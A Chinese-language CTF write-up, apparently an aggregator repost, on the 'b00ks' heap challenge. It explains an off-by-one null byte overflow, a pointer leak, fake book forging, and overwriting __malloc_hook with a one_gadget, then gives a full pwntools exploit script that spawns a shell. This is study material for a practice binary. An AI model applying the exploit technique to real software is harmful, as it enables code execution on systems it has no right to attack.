off-by-one (b00ks)

Posted Ff.cheng

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了off-by-one (b00ks)相关的知识,希望对你有一定的参考价值。

前言

个人简略记录,过程不详细

gdb开始调试

vmmap查看程序基地址为 0x555555400000


继续运行,输入auth

search hollk关键字,auth存放的地址可以找出为:0x555555602040 圈起来的是溢出的 \\x00

创建两个books


因为图书的结构体指针存放在off_202010中,所以存放的地址为

0x555555400000 + 0x202010 = 0x555555602010

0x555555602010存放的是地址:0x0000555555602060 ,这里存放着两个book的地址

book1: 0x0000555555603770 book2:0x00005555556037a0


如果此时随便打印任意一个图书,当展示auth时,会将book1的地址(book1_addr)打印出来


book存储的结构如下

book_id
book_name
book_desc

得到book2的name与desc相对于book1_addr的偏移为:

book2_name - book1_addr = 0x559512b164a8 - 0x559512b16470 = 0x38
book2_desc - book1_addr = 0x559512b164b0 - 0x559512b16470 = 0x40

然后再次修改auth_name,会导致book1_addr由 0x0000559512b16470 变为 0x0000559512b16400 而改变后的地址在book1_desc中,即这种情况:

然后打印book2_name和book2_desc的地址

当申请的内存空间比较大时,空间将由mmap进行分配,而mmap分配的内存与libc的基地址存在一个固定的偏移,也就是说我们拿分配的地址-固定偏移量,就可以得到libc基地址

然后调试计算与libc基址的偏移,然后算 __malloc_hook 或者 __free_hook 和one_gadget

然后利用fake_book与book2向同一地址写入__malloc_hook 或者 __free_hook 与one_gadget获取shell

exp

from pwn import *
#from LibcSearcher import LibcSearcher
context(os='linux', arch='i386', log_level='debug')
context.terminal=['cmd.exe', '/c', 'start', 'wsl.exe']

binary = ELF("b00ks")
libc = ELF("/root/glibc-all-in-one/libs/2.31-0ubuntu9.7_amd64/libc-2.31.so")
r = process("./b00ks")

def createbook(name_size, name, des_size, des):
        r.readuntil("> ")
        r.sendline("1")
        r.readuntil(": ")
        r.sendline(str(name_size))
        r.readuntil(": ")
        r.sendline(name)
        r.readuntil(": ")
        r.sendline(str(des_size))
        r.readuntil(": ")
        r.sendline(des)

def printbook(id):
        r.readuntil("> ")
        r.sendline("4")
        r.readuntil(": ")
        for i in range(id):
                book_id = int(r.readline()[:-1])
                r.readuntil(": ")
                book_name = r.readline()[:-1]
                r.readuntil(": ")
                book_des = r.readline()[:-1]
                r.readuntil(": ")
                book_author = r.readline()[:-1]
        return book_id, book_name, book_des, book_author

def createname(name):
        r.readuntil("name: ")
        r.sendline(name)

def changename(name):
        r.readuntil("> ")
        r.sendline("5")
        r.readuntil(": ")
        r.sendline(name)

def editbook(book_id,new_des):
        r.readuntil("> ")
        r.sendline("3")
        r.readuntil(": ")
        r.writeline(str(book_id))
        r.readuntil(": ")
        r.sendline(new_des)

def deletebook(book_id):
        r.readuntil("> ")
        r.sendline("2")
        r.readuntil(": ")
        r.sendline(str(book_id))
     
createname("hollkaaabbbbbbbbccccccccdddddddd")

createbook(216, "hollk_boo1", 160, "desc1")
createbook(0x21000, "hollk_boo2", 0x21000, "hollk_desc2")
        
book_id_1, book_name, book_des, book_author = printbook(1)
book1_addr = u64(book_author[32:32+6].ljust(8,b'\\x00'))
log.success("book1_address:" + hex(book1_addr))

payload = b'b'*112 + p64(1) + p64(book1_addr + 0x38) + p64(book1_addr+0x40) + p64(0xffff)
editbook(book_id_1,payload)
changename("hollkaaabbbbbbbbccccccccdddddddd")

book_id_1, book_name, book_des, book_author = printbook(1)
book2_name_addr = u64(book_name.ljust(8,b"\\x00"))
book2_des_addr = u64(book_des.ljust(8,b"\\x00"))
log.success("book2 name addr:" + hex(book2_name_addr))
log.success("book2 des addr:" + hex(book2_des_addr))

libc_base = book2_name_addr + 0x21ff0
log.success("libc base:" + hex(libc_base))

free_hook = libc_base + libc.symbols["__malloc_hook"]
one_gadget = libc_base + 0xe3b31 # 0xe3b31 、0xe3b34
log.success("free_hook:" + hex(free_hook))
log.success("one_gadget:" + hex(one_gadget))

editbook(1, p64(free_hook))
editbook(2, p64(one_gadget))


createbook(216, "hollk_boo1", 160, "desc1")
r.interactive()

参考

https://blog.csdn.net/qq_41202237/article/details/108116618

以上是关于off-by-one (b00ks)的主要内容,如果未能解决你的问题,请参考以下文章

Unlink学习笔记(off-by-one null byte漏洞利用)

linux(x86) exploit 开发系列3:off-by-one

Linux (x86) Exploit系列之三 Off-By-One 漏洞 (基于栈)

JS中的0b00与0x00表示什么

[UIImageView CGImage]:无法识别的选择器发送到实例 0x1783e5b00

ActiveMQ配置ssl安全连接